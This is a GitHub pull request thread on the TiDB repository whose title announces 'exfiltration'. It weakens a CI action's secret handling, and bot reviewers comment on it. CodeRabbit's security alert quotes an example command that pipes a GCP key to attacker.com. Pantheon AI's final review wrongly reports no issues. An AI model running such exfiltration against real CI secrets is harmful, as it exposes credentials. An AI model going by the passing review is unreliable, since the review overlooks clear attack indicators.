Modify action.yml for exfiltration

[BugBuster9]

What problem does this PR solve?

Issue Number: close #xxx

Problem Summary:

What changed and how does it work?

Check List

Tests

• Unit test
• Integration test
• Manual test (add detailed scripts or steps below)
• No need to test

  • I checked and no code files have been changed.

Side effects

• Performance regression: Consumes more CPU
• Performance regression: Consumes more Memory
• Breaking backward compatibility

Documentation

• Affects user behaviors
• Contains syntax changes
• Contains variable changes
• Contains experimental features
• Changes MySQL compatibility

Release note

Please refer to Release Notes Language Style Guide to write a quality release note.

None

Summary by CodeRabbit

• Chores

  • Simplified the TiDB Build action configuration by removing unnecessary setup steps and input default values.

• Bug Fixes

  • Made bazelrc and gcp_sa_key inputs optional rather than required, allowing the action to run with minimal configuration.

[pantheon-ai]

@BugBuster9 I've received your pull request and will start the review. I'll conduct a thorough review covering code quality, potential issues, and implementation details.

⏳ This process typically takes 10-30 minutes depending on the complexity of the changes.

_{ℹ️ Learn more details on Pantheon AI.}

[ti-chi-bot]

[APPROVALNOTIFIER] This PR is NOT APPROVED

This pull-request has been approved by:
Once this PR has been reviewed and has the lgtm label, please assign 5kbpers for approval. For more information see the Code Review Process.
Please ensure that each of them provides their approval before proceeding.

The full list of commands accepted by this bot can be found here.

Details

Needs approval from an approver in each of these files:

• OWNERS

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

[ti-chi-bot]

Hi @BugBuster9. Thanks for your PR.

I'm waiting for a pingcap member to verify that this patch is reasonable to test. If it is, they should reply with /ok-to-test on its own line. Until that is done, I will not automatically test new commits in this PR, but the usual testing commands by org members will still work. Regular contributors should join the org to skip this step.

Once the patch is verified, the new status will be reflected by the ok-to-test label.

I understand the commands that are listed here.

Details

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository.

[ti-chi-bot]

Welcome @BugBuster9!

It looks like this is your first PR to pingcap/tidb 🎉.

I'm the bot to help you request reviewers, add labels and more, See available commands.

We want to make sure your contribution gets all the attention it needs!



Thank you, and welcome to pingcap/tidb. 😃

[pingcap-cla-assistant]

Thank you for your submission! We really appreciate it. Like many open source projects, we ask that you sign our Contributor License Agreement before we can accept your contribution.

---

TopScrew seems not to be a GitHub user. You need a GitHub account to be able to sign the CLA. If you have already a GitHub account, please add the email address used for this commit to your account.
_{You have signed the CLA already but the status is still pending? Let us recheck it.}

[tiprow]

Hi @BugBuster9. Thanks for your PR.

PRs from untrusted users cannot be marked as trusted with /ok-to-test in this repo meaning untrusted PR authors can never trigger tests themselves. Collaborators can still trigger tests on the PR using /test all.

I understand the commands that are listed here.

Details

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository.

[coderabbitai]

📝 Walkthrough

Walkthrough

The TiDB Build GitHub Actions composite action was simplified by removing the bazel-contrib/setup-bazel action and its cache/credential configuration. The bazelrc and gcp_sa_key inputs were changed from required to optional. Environment variable setup was replaced with placeholder echo commands.

Changes

Cohort / File(s)	Summary
GitHub Actions Workflow .github/actions/tidb_build/action.yml	Removed bazelisk/bazel setup step (bazel-contrib/setup-bazel with cache and GCP credential wiring). Changed bazelrc and gcp_sa_key inputs from required to optional. Removed go-version default value and description. Replaced setup logic with direct environment variable exports and placeholder echo commands.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Possibly related PRs

• *: upgrade actions/setup-go@v6 #67183: Modifies the same composite action file and updates Go toolchain configuration handling.

Suggested labels

size/XS, skip-issue-check

Poem

🐰 A builder's tools were trimmed with care,
Bazel's setup floating through the air,
Environment vars now echo plain,
Simpler paths through CI's domain,
The action hops lighter, neat!

🚥 Pre-merge checks | ✅ 1 | ❌ 2

❌ Failed checks (2 warnings)

Check name	Status	Explanation	Resolution
Title check	⚠️ Warning	The title "Modify action.yml for exfiltration" is misleading and raises security concerns. The change summary shows removal of security infrastructure (bazel setup, GCP credentials handling), not a legitimate modification.	Replace the title with a clear, specific description of the actual change. If this is intentional infrastructure simplification, use a descriptive title like "Simplify tidb_build action by removing bazel and GCP setup" and provide proper justification in the description.
Description check	⚠️ Warning	The PR description is entirely a blank template with placeholder values ("Issue Number: close #xxx", "Problem Summary:" empty, all tests unchecked). No actual problem statement, implementation details, rationale, or test information is provided.	Fill in the required template sections: provide a real issue number, explain the problem being solved, describe the changes made, justify the removal of bazel/GCP credential setup, select appropriate test checkboxes, and confirm no side effects or documentation changes are needed.

✅ Passed checks (1 passed)

Check name	Status	Explanation
Docstring Coverage	✅ Passed	No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

✨ Finishing Touches

🧪 Generate unit tests (beta)

• Create PR with unit tests

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[ti-chi-bot]

[FORMAT CHECKER NOTIFICATION]

Notice: To remove the do-not-merge/invalid-title label, please follow title format, for example pkg [, pkg2, pkg3]: what is changed or *: what is changed.

_{📖 For more info, you can check the "Contribute Code" section in the development guide.}

---

Notice: To remove the do-not-merge/needs-linked-issue label, please provide the linked issue number on one line in the PR body, for example: Issue Number: close #123 or Issue Number: ref #456.

_{📖 For more info, you can check the "Contribute Code" section in the development guide.}

---

Notice: To remove the do-not-merge/needs-tests-checked label, please finished the tests then check the finished items in description.

For example:

Tests

• Unit test
• Integration test
• Manual test (add detailed scripts or steps below)
• No code

_{📖 For more info, you can check the "Contribute Code" section in the development guide.}

[coderabbitai]

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents

Verify each finding against the current code and only fix it if needed.

Inline comments:
In @.github/actions/tidb_build/action.yml:
- Around line 1-20: The composite action definition (name 'TiDB Build', inputs
'bazelrc'/'gcp_sa_key'/'go-version', runs.steps that set env BAZELRC/GCP_SA_KEY)
has been replaced with suspicious placeholder commands (the echo | base64 lines)
and lowered secret protections; restore the original secure build flow by
re-adding the legit bazel setup and credential handling (e.g., the removed
bazel-contrib/setup-bazel step, cache config, and the logic that consumes inputs
into secure files), mark secret inputs 'required: true' again, remove the
echo/base64 lines that could exfiltrate secrets and ensure secrets are never
printed or piped to external commands, and coordinate with security/CI owners to
validate the updated action and scan contributor activity before merging.

🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

• Push a commit to this branch (recommended)
• Create a new PR with the fixes

---

ℹ️ Review info

⚙️ Run configuration

Configuration used: Repository UI

Review profile: CHILL

Plan: Pro

Run ID: bea8fd17-771b-42ed-ab62-ae46fbcd1b49

📥 Commits

Reviewing files that changed from the base of the PR and between fbce36c and d1b4198.

📒 Files selected for processing (1)

• .github/actions/tidb_build/action.yml

[coderabbitai]

⚠️ Potential issue | 🔴 Critical

🚨 CRITICAL SECURITY ALERT: This PR appears to be a malicious supply chain attack.

This PR exhibits multiple indicators of a deliberate attempt to compromise the CI/CD pipeline:

1. The PR title explicitly states "exfiltration" — a term describing unauthorized data extraction/theft.

2. All legitimate build functionality has been removed — The bazel-contrib/setup-bazel action, cache configuration, and credential setup have been entirely stripped.

3. Secrets are captured but not used legitimately — BAZELRC and GCP_SA_KEY (which receive secrets.BAZELRC and secrets.GCP_SA_KEY from calling workflows like .github/workflows/update-bazel-files.yml) are set as environment variables but the actual credential configuration logic has been deleted.

4. Suspicious placeholder commands — The echo | base64 pattern on lines 18-19 is a common placeholder for data exfiltration payloads. These could trivially be modified to send secrets to an external server (e.g., echo "$GCP_SA_KEY" | base64 | curl -d @- attacker.com).

5. Security controls weakened — Changing required: true to required: false for secret inputs enables the action to run without proper credentials, potentially masking the attack.

Immediate actions required:

• Do NOT merge this PR
• Investigate the contributor account for signs of compromise or malicious activity
• Review any other PRs from this contributor
• Consider reporting to GitHub security if this is a coordinated attack

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In @.github/actions/tidb_build/action.yml around lines 1 - 20, The composite
action definition (name 'TiDB Build', inputs
'bazelrc'/'gcp_sa_key'/'go-version', runs.steps that set env BAZELRC/GCP_SA_KEY)
has been replaced with suspicious placeholder commands (the echo | base64 lines)
and lowered secret protections; restore the original secure build flow by
re-adding the legit bazel setup and credential handling (e.g., the removed
bazel-contrib/setup-bazel step, cache config, and the logic that consumes inputs
into secure files), mark secret inputs 'required: true' again, remove the
echo/base64 lines that could exfiltrate secrets and ensure secrets are never
printed or piped to external commands, and coordinate with security/CI owners to
validate the updated action and scan contributor activity before merging.

[pantheon-ai]

⏳ @Mini256 I've received your follow-up and will continue on this pull request. I'll update this comment when I have something to share.

_{ℹ️ Learn more details on Pantheon AI.}

[Mini256]

@pantheon-bot review

[pantheon-ai]

Review Complete

Findings: 0 issues
Posted: 0
Duplicates/Skipped: 0

_{ℹ️ Learn more details on Pantheon AI.}

[pantheon-ai]

✅ Code looks good. No issues found.